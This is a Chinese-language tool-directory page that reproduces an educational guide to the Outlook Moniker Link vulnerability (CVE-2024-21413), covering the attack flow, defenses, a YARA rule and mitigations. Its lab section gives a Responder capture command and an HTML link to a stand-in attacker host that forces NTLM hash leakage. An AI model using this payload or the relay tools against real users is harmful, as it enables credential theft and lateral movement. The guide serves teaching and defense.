Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Moniker-Link--CVE-2024-21413- — 关于 CVE-2024-21413(Outlook 零点击 Moniker Link 漏洞)的教育指南,涵盖攻击流程、NTLM 凭据捕获、使用 YARA 检测和缓解策略。 | Kitploit
工具/GitHubGitHub/bhatbhupendra/moniker-link--cve-2024-21413-
密码破解钓鱼工具漏洞分析漏洞利用IDS/IPS规避横向移动渗透测试学习与教育红队

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
电子邮件安全
GitHubbhatbhupendra/moniker-link--cve-2024-21413-

Moniker-Link--CVE-2024-21413-

关于 CVE-2024-21413(Outlook 零点击 Moniker Link 漏洞)的教育指南,涵盖攻击流程、NTLM 凭据捕获、使用 YARA 检测和缓解策略。

查看仓库
175个月前尚未审核

🔗 Moniker Link (CVE-2024-21413) — Outlook 零点击漏洞实用指南


📌 1. 引言

CVE-2024-21413,通常称为 Moniker Link 漏洞,是 Microsoft Outlook 中的一个严重安全缺陷,使攻击者能够无需任何交互即可泄露用户凭据。

与传统的网络钓鱼攻击不同,此漏洞只需预览电子邮件即可触发,使其在企业环境中尤其危险。

问题源于 Outlook 处理 moniker 链接的方式,导致向攻击者控制的系统发起意外的身份验证尝试。


🧠 2. 关键概念

理解以下概念至关重要:

🔹 Moniker Link

一种 Windows 特有的机制,允许应用程序使用以下协议引用外部资源:

  • file://
  • unc://

🔹 NTLM 身份验证

  • 一种旧版 Windows 身份验证协议
  • 在访问远程资源时自动发送哈希凭据
  • 容易受到凭据捕获和中继攻击

🔹 UNC 路径(通用命名约定)

\\attacker-server\share

用于通过网络访问共享资源。在该漏洞中,它被滥用以强制身份验证请求。

🔹 受保护视图绕过

Outlook 的受保护视图旨在隔离潜在不安全的内容。 此漏洞绕过了该保护,允许访问外部资源。


⚙️ 3. 工作原理

攻击流程(逐步)

  1. 构造有效载荷

    • 攻击者在电子邮件中嵌入恶意的 moniker 链接(例如 file://attacker-server/share)。
  2. 投递

    • 电子邮件发送给受害者。
  3. 触发

    • 受害者在 Outlook 中预览或打开该电子邮件。
  4. 自动处理

    • Outlook 无需用户交互即处理该链接。
  5. 身份验证请求

    • Windows 尝试向攻击者的服务器进行 NTLM 身份验证。
  6. 凭据泄露

    • 攻击者捕获 NTLM 哈希。

攻击流程图

[Attacker]
    |
    | 1. Send crafted email
    v
[Victim Outlook]
    |
    | 2. Auto-process moniker link
    v
[Windows System]
    |
    | 3. NTLM authentication attempt
    v
[Attacker Server]
    |
    | 4. Capture NTLM hash
    v
[Credential Abuse / Lateral Movement]

🌍 4. 现实影响

常见攻击场景

  • 针对组织的有针对性的网络钓鱼活动
  • 在企业网络中收集凭据
  • 为横向移动提供初始访问

攻击者目标

  • 捕获 NTLM 哈希
  • 将身份验证中继到内部服务
  • 在网络内部提升权限

🛠️ 5. 工具与技术

攻击/研究工具

  • Responder — 捕获 NTLM 身份验证哈希
  • Impacket — 网络利用工具包
  • ntlmrelayx.py — 执行 NTLM 中继攻击

防御工具

  • Microsoft Defender — 端点检测与响应
  • Wireshark — 网络流量检查
  • Sysmon — 高级系统事件日志记录

💻 6. 动手示例(仅限实验室环境)

⚠️ 仅在受控实验室环境中执行

启动 NTLM 捕获服务

sudo responder -I eth0

恶意链接示例

<a href="file://attacker-ip/share">Open Document</a>

预期输出

[SMB] NTLMv2 Hash captured
User: victim

🛡️ 7. 检测(YARA 规则)

Florian Roth 开发了一条检测规则,用于识别涉及 moniker 链接的利用尝试。

YARA 规则示例

rule Outlook_MonikerLink_CVE_2024_21413
{
    meta:
        description = "Detects Outlook Moniker Link exploitation via file:// or UNC paths"
        author = "Florian Roth"
        reference = "CVE-2024-21413"
    
    strings:
        $a = "file://"
        $b = "\\\\"
    
    condition:
        any of them
}

检测用例

  • 电子邮件网关扫描
  • SIEM 警报生成
  • 针对可疑链接的威胁狩猎

🛡️ 8. 缓解措施与最佳实践

补丁管理

  • 立即应用 Microsoft 提供的安全更新

身份验证强化

  • 尽可能禁用 NTLM
  • 强制使用 Kerberos 身份验证

网络控制

  • 阻止到外部网络的出站 SMB(TCP 445)
  • 限制不必要的出站连接

电子邮件安全

  • 过滤或清理 file:// 和基于 UNC 的链接
  • 使用高级电子邮件威胁防护解决方案

监控与检测

  • 监控出站身份验证尝试
  • 记录并警报异常的 SMB 流量

⚠️ 9. 常见错误

  • 认为需要用户交互
  • 忽视现代环境中与 NTLM 相关的风险
  • 仅依赖防病毒软件而缺乏网络控制
  • 延迟部署补丁

🧾 10. 结论

CVE-2024-21413 展示了深度集成的系统行为(如自动身份验证)如何通过看似无害的输入(如电子邮件链接)被利用。

关键要点

  • 零点击漏洞 — 无需用户交互
  • 利用 Outlook 对 moniker 链接的处理
  • 导致 NTLM 凭据泄露
  • 可通过 YARA 和网络监控检测
  • 可通过打补丁和正确配置预防

📚 11. 延伸阅读

  • Microsoft 安全公告 — CVE-2024-21413
  • Impacket 文档(NTLM 中继攻击)
  • YARA 文档
  • OWASP 身份验证速查表

💡 建议: 在虚拟实验室(例如 Windows VM + 攻击者 VM)中重现此漏洞,以充分理解攻击链和防御策略。

下载工具